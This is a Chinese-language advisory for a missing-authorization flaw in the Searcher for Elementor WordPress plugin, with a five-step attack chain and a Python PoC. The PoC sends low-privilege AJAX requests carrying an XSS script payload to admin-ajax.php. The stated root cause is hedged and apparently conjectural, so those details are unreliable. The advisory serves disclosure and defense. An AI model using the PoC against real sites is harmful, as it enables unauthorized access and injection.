CVE-2025-66137 WordPress Searcher for Elementor插件访问控制漏洞

漏洞信息

漏洞编号

CVE-2025-66137

漏洞类型

缺少授权/访问控制错误配置

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

merkulove Searcher for Elementor (WordPress插件)

漏洞概述

CVE-2025-66137是WordPress插件Searcher for Elementor中的一个中等严重性安全漏洞，CVSS评分5.4。该漏洞属于缺少授权（Missing Authorization）类型，存在于插件的搜索功能访问控制机制中。攻击者可以利用此漏洞绕过正常的访问控制检查，以低权限用户身份执行原本需要更高权限的操作。Searcher for Elementor是由merkulove开发的WordPress插件，主要用于为Elementor页面构建器提供增强的搜索功能。由于该插件在处理搜索请求时未正确验证用户权限，认证用户（包括低权限用户）可以访问或修改本应受保护的功能。此漏洞影响版本从n/a到1.0.3（含），已被Patchstack安全团队发现并报告。建议所有使用该插件的用户立即检查并更新至最新版本以修复此安全问题。

技术细节

该漏洞的根本原因在于Searcher for Elementor插件的AJAX处理函数缺少适当的权限检查。插件在注册AJAX钩子时使用了错误的权限回调，或者完全遗漏了权限验证逻辑。在WordPress中，AJAX端点应该使用current_user_can()或类似的权限检查函数来确保只有具有适当权限的用户才能执行特定操作。该插件的searcher_elementor_ajax_search函数直接处理用户提交的搜索参数，而没有验证调用者是否具有管理员权限。攻击者可以通过构造特定的AJAX请求，传递精心设计的search参数来触发漏洞。攻击成功后，攻击者可以：1）获取站点搜索配置信息；2）修改搜索设置；3）可能通过搜索功能注入恶意内容或提取敏感数据。由于该漏洞利用复杂度低（AC:L），且不需要用户交互（UI:N），攻击者可以在短时间内自动化扫描和利用过程。CVSS向量AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N表明该漏洞主要影响数据的机密性和完整性，但不会直接导致系统完全沦陷或服务中断。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者扫描目标WordPress网站，识别是否安装了Searcher for Elementor插件（版本<=1.0.3）

STEP 2

步骤2

获取访问权限：攻击者注册一个低权限用户账户（如订阅者角色）或通过其他方式获取有效会话cookie

STEP 3

步骤3

构造恶意请求：攻击者构造针对admin-ajax.php的AJAX请求，指定action为searcher_elementor_ajax_search，并包含恶意搜索参数

STEP 4

步骤4

绕过访问控制：由于插件缺少权限检查，低权限用户发送的请求被服务器接受并执行

STEP 5

步骤5

利用漏洞：攻击者可以获取敏感搜索配置信息、修改搜索设置、或通过搜索功能注入恶意内容

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-66137 PoC - Searcher for Elementor Broken Access Control
# Target: WordPress site with Searcher for Elementor plugin <= 1.0.3

target_url = "http://target-wordpress-site.com/wp-admin/admin-ajax.php"

# Authenticated low-privilege user session
cookies = {
    "wordpress_test_cookie": "WP+Cookie+check",
    "wordpress_logged_in_user": "your_session_cookie"
}

# Step 1: Identify if the plugin is installed and vulnerable
def check_vulnerability():
    params = {
        "action": "searcher_elementor_ajax_search",
        "search": "test",
        "security": ""
    }
    
    try:
        response = requests.get(target_url, params=params, cookies=cookies)
        # If we get a response without proper authorization check, vulnerability exists
        if response.status_code == 200:
            print(f"[+] Plugin is installed, checking for access control issue...")
            print(f"[+] Response: {response.text[:500]}")
            return True
    except requests.RequestException as e:
        print(f"[-] Request failed: {e}")
    return False

# Step 2: Exploit the broken access control
def exploit_access_control():
    # This payload attempts to access admin-only searcher settings
    params = {
        "action": "searcher_elementor_ajax_search",
        "search": "<script>alert('XSS')</script>",
        "searcher_options": "1"
    }
    
    response = requests.post(target_url, data=params, cookies=cookies)
    print(f"[+] Exploit response status: {response.status_code}")
    print(f"[+] Response content: {response.text}")

if __name__ == "__main__":
    print("CVE-2025-66137 PoC - Searcher for Elementor <= 1.0.3")
    print("Type: Missing Authorization / Broken Access Control")
    check_vulnerability()

影响范围

Searcher for Elementor <= 1.0.3

防御指南

临时缓解措施

作为临时缓解措施，管理员应立即检查并更新Searcher for Elementor插件至最新版本。同时，应审查所有用户账户权限，确保遵循最小权限原则，只授予用户必要的操作权限。可以考虑使用WordPress安全插件（如Wordfence）来监控异常的AJAX请求模式。此外，应定期审计已安装的插件和主题，及时更新到最新版本以防止类似的安全漏洞被利用。